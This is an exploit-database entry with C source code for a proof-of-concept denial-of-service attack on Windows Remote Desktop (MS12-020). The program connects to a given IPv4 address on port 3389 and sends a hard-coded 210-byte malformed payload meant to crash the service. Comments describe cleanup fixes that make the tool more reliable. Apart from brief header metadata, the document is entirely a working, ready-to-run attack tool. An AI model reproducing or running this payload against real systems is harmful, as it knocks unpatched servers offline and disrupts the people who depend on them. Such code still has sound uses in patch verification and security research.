MS12-020 DoS PoC (210 byte payload)



EKU-ID: 1680 CVE: OSVDB-ID:
Author: expku Published: 2012-03-19 Verified: Verified



#include "stdio.h"
#include "winsock2.h"
#pragma comment(lib, "ws2_32.lib")

/*
 * Fixed 210-byte request that main() writes to the target once, unchanged.
 * The declared size matches the initializer exactly (26 rows of 8 bytes
 * plus the final 2), so sizeof(hexData) is the length that gets sent.
 *
 * NOTE(review): several initializers exceed 0x7F; storing them in a plain
 * `char` array relies on the implementation-defined conversion to signed
 * char (MSVC accepts it with a warning). `unsigned char` would be the
 * portable element type, but send() takes const char * on this platform,
 * so the cast would just move to the call site.
 */
const char hexData[210] =
{
    0x03, 0x00, 0x00, 0x13, 0x0E, 0xE0, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x01, 0x00, 0x08, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x6A, 0x02,
    0xF0, 0x80, 0x7F, 0x65, 0x82, 0x00, 0x5E, 0x04,
    0x01, 0x01, 0x04, 0x01, 0x01, 0x01, 0x01, 0xFF,
    0x30, 0x19, 0x02, 0x01, 0xFF, 0x02, 0x01, 0xFF,
    0x02, 0x01, 0x00, 0x02, 0x01, 0x01, 0x02, 0x01,
    0x00, 0x02, 0x01, 0x01, 0x02, 0x02, 0x00, 0x7C,
    0x02, 0x01, 0x02, 0x30, 0x19, 0x02, 0x01, 0xFF,
    0x02, 0x01, 0xFF, 0x02, 0x01, 0x00, 0x02, 0x01,
    0x01, 0x02, 0x01, 0x00, 0x02, 0x01, 0x01, 0x02,
    0x02, 0x00, 0x7C, 0x02, 0x01, 0x02, 0x30, 0x19,
    0x02, 0x01, 0xFF, 0x02, 0x01, 0xFF, 0x02, 0x01,
    0x00, 0x02, 0x01, 0x01, 0x02, 0x01, 0x00, 0x02,
    0x01, 0x01, 0x02, 0x02, 0x00, 0x7C, 0x02, 0x01,
    0x02, 0x04, 0x82, 0x00, 0x00, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x0C, 0x02, 0xF0, 0x80, 0x38, 0x00, 0x06, 0x03,
    0xF0, 0x03, 0x00, 0x00, 0x09, 0x02, 0xF0, 0x80,
    0x21, 0x80
};

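/*
 * Entry point: opens one TCP connection to argv[1] on port 3389, writes
 * the fixed buffer hexData once, and closes the connection.
 *
 * argv[1] must be a dotted-quad IPv4 address; inet_addr() does no name
 * resolution.  Returns 0 once the send has completed and 1 on any
 * failure (missing argument, Winsock startup, socket, connect or send).
 *
 * Fixes relative to the original: argv[1] is no longer dereferenced when
 * no argument is given; socket() failure is detected via INVALID_SOCKET
 * (it never returns 0 on error, so the old `== 0` test was dead); the
 * bare `return;` statements in an int function are replaced by a real
 * status; WSACleanup() is always called; format specifiers match their
 * argument types.
 */
int
main(int argc, char* argv[])
{
    WSADATA wsaData;
    SOCKET hSocket;
    struct sockaddr_in victim = {0};
    int result;
    int rc = 1;

    printf("MS12-020 DoS PoC (210 byte payload)\n");
    printf("by Alex Ionescu (@aionescu)\n");
    printf("based on jduck Ruby PoC and Luigi's MSRC PoC\n");

    /* Running without an address used to crash on a NULL argv[1]. */
    if (argc < 2 || argv[1] == NULL) {
        printf("usage: %s <ipv4-address>\n", argv[0]);
        return 1;
    }

    result = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (result != 0) {
        printf("WSAStartup failed: %d\n", result);
        return 1;
    }

    hSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    /* SOCKET is pointer-sized; cast so the specifier is correct on x64. */
    printf("Created socket 0x%llx\n", (unsigned long long)hSocket);
    /* socket() reports failure as INVALID_SOCKET, never 0. */
    if (hSocket == INVALID_SOCKET) {
        printf("socket() failed: %d\n", WSAGetLastError());
        goto cleanup_wsa;
    }

    victim.sin_family = AF_INET;
    victim.sin_port = htons(3389);
    victim.sin_addr.s_addr = inet_addr(argv[1]);
    /* inet_addr() has no separate error channel; INADDR_NONE also
     * matches 255.255.255.255, which is an acceptable limitation here. */
    if (victim.sin_addr.s_addr == INADDR_NONE) {
        printf("'%s' is not a valid IPv4 address\n", argv[1]);
        goto cleanup_socket;
    }
    printf("Connecting to %s...\n", argv[1]);

    result = connect(hSocket, (SOCKADDR*)&victim, sizeof(victim));
    if (result != 0) {
        printf("connect() failed: %d\n", WSAGetLastError());
        goto cleanup_socket;
    }

    printf("Sending payload of 0x%lx bytes\n", (unsigned long)sizeof(hexData));
    result = send(hSocket, hexData, (int)sizeof(hexData), 0);
    if (result == SOCKET_ERROR) {
        printf("send() failed: %d\n", WSAGetLastError());
        goto cleanup_socket;
    }
    /* send() returns a byte count as int; %d is the matching specifier. */
    printf("Sent %d bytes to server\n", result);
    rc = 0;

cleanup_socket:
    closesocket(hSocket);
cleanup_wsa:
    WSACleanup();
    return rc;
}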